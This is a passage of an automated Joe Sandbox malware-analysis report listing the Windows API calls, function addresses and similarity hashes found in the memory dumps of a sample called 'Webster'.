                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: 682e935aead25261afd47356889bce32e091b08778859d4ba10dbc986ee06561
                                                                                  • Instruction ID: 035094105b36f2580e33984877d08a3320340403b6ccd77296035489c43df623
                                                                                  • Opcode Fuzzy Hash: 682e935aead25261afd47356889bce32e091b08778859d4ba10dbc986ee06561
                                                                                  • Instruction Fuzzy Hash: DE51C434608B029BDB28AF79D995A2DF7F5AF45310B20881FE547CB7A1FB70D8808B05
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00AFF526
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00AFF534
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00AFF5F4
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00AFF603
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2576544623-0
                                                                                  • Opcode ID: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                                                  • Instruction ID: 011c5e04d6bed97431507a40510b4bc04b3332d929de123d0ecc8d019009635f
                                                                                  • Opcode Fuzzy Hash: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                                                  • Instruction Fuzzy Hash: D3517DB1108315AFD710EF64D885EABB7E8EF98710F40492DF595D72A1EB70E904CB92
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                  • Instruction ID: 4a47fb3dc1865ed6052fe873d806a37ab1972d76f38230d3dd327252adcfaeff
                                                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                  • Instruction Fuzzy Hash: 844196356007069BDF288F69C9909AFBBA5AFCA3A0B24817DF455C76D0D7B09D508B44
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ADA68A
                                                                                  • __itow.LIBCMT ref: 00ADA6BB
                                                                                    • Part of subcall function 00ADA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ADA976
                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ADA724
                                                                                  • __itow.LIBCMT ref: 00ADA77B
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                                                  • Instruction ID: 6080cd1a51a77141f773811419129b00a835be486a4442838adfa2c4d2fd6c0e
                                                                                  • Opcode Fuzzy Hash: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                                                  • Instruction Fuzzy Hash: C4416E75A00309ABDF11EF54C956BEE7BB9EF54750F04006AF906A3391DB709A44CAA2
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00AF70BC
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF70CC
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AF7130
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF713C
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                                  • String ID:
                                                                                  • API String ID: 2214342067-0
                                                                                  • Opcode ID: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                                                  • Instruction ID: c9e78a2e96474157aa257a85cd524055c6821c62aeba25f99af041643e5eebdf
                                                                                  • Opcode Fuzzy Hash: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                                                  • Instruction Fuzzy Hash: 9A41BF717442016FEB24BF64DD86F7E77E4AB08B14F048558FA199B3D2EBB09C008B91
                                                                                  APIs
                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B10980), ref: 00AF6B92
                                                                                  • _strlen.LIBCMT ref: 00AF6BC4
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: cd763a538b98c9cbd4e2ba9a6e58470fa405ee2b289f67dde26d9b54b962fce2
                                                                                  • Instruction ID: 9f7f0e57f539fd3fcd88f5711863c12c5b10ff2df7572545612a786800754964
                                                                                  • Opcode Fuzzy Hash: cd763a538b98c9cbd4e2ba9a6e58470fa405ee2b289f67dde26d9b54b962fce2
                                                                                  • Instruction Fuzzy Hash: 01419071A00109AFCB14FBA4DE96EBEB3B9EF58310F148155F95A9B292DF30AD41C790
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B08F03
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                                                  • Instruction ID: cb1252776e8fd23b2b3dd8e2ff221cf79a50af50e1d9854f44ba9ed68a948b7f
                                                                                  • Opcode Fuzzy Hash: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                                                  • Instruction Fuzzy Hash: 7631C33465411AEEEF209A24CC85BAC3FE6EB06320F544991FA91D71E1CFB0DB50CB91
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B0B248
                                                                                  • PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                                                  • MessageBeep.USER32(00000000), ref: 00B0B2C9
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                                                  • Instruction ID: 8f9e54fd1c236fc6cb2e6a132714f8d25c8cbc6d50825a4a39cce0d9f31ab7ab
                                                                                  • Opcode Fuzzy Hash: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                                                  • Instruction Fuzzy Hash: E8414734A04219DFDB11DF99C884EAD7FF5FB4A350F1885E9E8189B2A5DB30A941CB90
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AE1326
                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AE1342
                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AE13A8
                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AE13FA
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                                                  • Instruction ID: 3bcbc4e818bbf3c8dbdd15eee4f9128d505e4b381903c64e9495f7673674a46c
                                                                                  • Opcode Fuzzy Hash: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                                                  • Instruction Fuzzy Hash: A3316E709402A9AEFF3187278C05BFEBBB6AB44310F04831AF4D05A6D5D3748D919B51
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AE1465
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AE1481
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AE14E0
                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AE1532
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                                                  • Instruction ID: df67a6f7632f9aa601fe28f795501dbc7da2bc49ec7c99405d3ca878ec3d1453
                                                                                  • Opcode Fuzzy Hash: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                                                  • Instruction Fuzzy Hash: 10317BB09402A85EFF348B678C04BFEBBB6AB95310F48831AE491522D1C3788DC18B61
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AB642B
                                                                                  • __isleadbyte_l.LIBCMT ref: 00AB6459
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB6487
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB64BD
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                                                  • Instruction ID: 62e76cb6dd5e82742e97081ef8294711c1275487791356a26e53cd869b1ea122
                                                                                  • Opcode Fuzzy Hash: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                                                  • Instruction Fuzzy Hash: 5031D031600A56AFDB218F65CE44BEB7FA9FF41320F154429F82487192DB39E890DB50
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00B0553F
                                                                                    • Part of subcall function 00AE3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AE3B4E
                                                                                    • Part of subcall function 00AE3B34: GetCurrentThreadId.KERNEL32 ref: 00AE3B55
                                                                                    • Part of subcall function 00AE3B34: AttachThreadInput.USER32(00000000,?,00AE55C0), ref: 00AE3B5C
                                                                                  • GetCaretPos.USER32(?), ref: 00B05550
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00B0558B
                                                                                  • GetForegroundWindow.USER32 ref: 00B05591
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetCursorPos.USER32(?), ref: 00B0CB7A
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ABBCEC,?,?,?,?,?), ref: 00B0CB8F
                                                                                  • GetCursorPos.USER32(?), ref: 00B0CBDC
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ABBCEC,?,?,?), ref: 00B0CC16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  APIs
                                                                                  • __setmode.LIBCMT ref: 00AA0BE2
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                                                  • _fprintf.LIBCMT ref: 00AA0C19
                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00AD694C
                                                                                    • Part of subcall function 00AA4CCA: _flsall.LIBCMT ref: 00AA4CE3
                                                                                  • __setmode.LIBCMT ref: 00AA0C4E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                  • String ID:
                                                                                  • API String ID: 521402451-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                                                    • Part of subcall function 00AD8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                                                    • Part of subcall function 00AD8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                                                    • Part of subcall function 00AD8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                                                    • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AD92C1
                                                                                  • _memcmp.LIBCMT ref: 00AD92E4
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD931A
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD9321
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1592001646-0
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B063BD
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063D7
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063E5
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B063F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  APIs
                                                                                    • Part of subcall function 00ADF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF867
                                                                                    • Part of subcall function 00ADF858: lstrcpyW.KERNEL32(00000000,?), ref: 00ADF88D
                                                                                    • Part of subcall function 00ADF858: lstrcmpiW.KERNEL32(00000000,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF8BE
                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE488
                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00ADE4AE
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00AB5331
                                                                                    • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE4385
                                                                                  • _memset.LIBCMT ref: 00AE43A6
                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AE43F8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AE4401
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1157408455-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00AF6A84
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A8F
                                                                                  • _memmove.LIBCMT ref: 00AF6ABC
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00AF6AC7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 1504782959-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD9719
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD972B
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD9741
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD975C
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                                                  • GetClientRect.USER32(?,?), ref: 00ABB93C
                                                                                  • GetCursorPos.USER32(?), ref: 00ABB946
                                                                                  • ScreenToClient.USER32(?,?), ref: 00ABB951
                                                                                  Similarity
                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4127811313-0
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                  • GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  Similarity
                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3970641297-0
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE195E
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE1983
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE198D
                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE19C0
                                                                                  Similarity
                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                  • String ID:
                                                                                  • API String ID: 2875609808-0
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B0E1EA
                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B0E201
                                                                                  • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B0E216
                                                                                  • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B0E234
                                                                                  Similarity
                                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                                  • String ID:
                                                                                  • API String ID: 1352324309-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B0B956
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0B96E
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0B992
                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B0B9AD
                                                                                  Similarity
                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 357397906-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0BCB6
                                                                                  • _memset.LIBCMT ref: 00B0BCC5
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B48F20,00B48F64), ref: 00B0BCF4
                                                                                  • CloseHandle.KERNEL32 ref: 00B0BD06
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3277943733-0
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00AE71A1
                                                                                    • Part of subcall function 00AE7C7F: _memset.LIBCMT ref: 00AE7CB4
                                                                                  • _memmove.LIBCMT ref: 00AE71C4
                                                                                  • _memset.LIBCMT ref: 00AE71D1
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00AE71E1
                                                                                  Similarity
                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 48991266-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                    • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C3E8
                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00B0C3F5
                                                                                  • EndPath.GDI32(00000000), ref: 00B0C405
                                                                                  • StrokePath.GDI32(00000000), ref: 00B0C413
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                                                  • AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 00A8260D
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                                                  • GetStockObject.GDI32(00000005), ref: 00A82634
                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00ABC1C4
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ABC1D1
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00ABC1EA
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00ABC203
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00ABC223
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABC22E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1946975507-0
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 00AD9339
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9340
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AD8F04), ref: 00AD934D
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9354
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
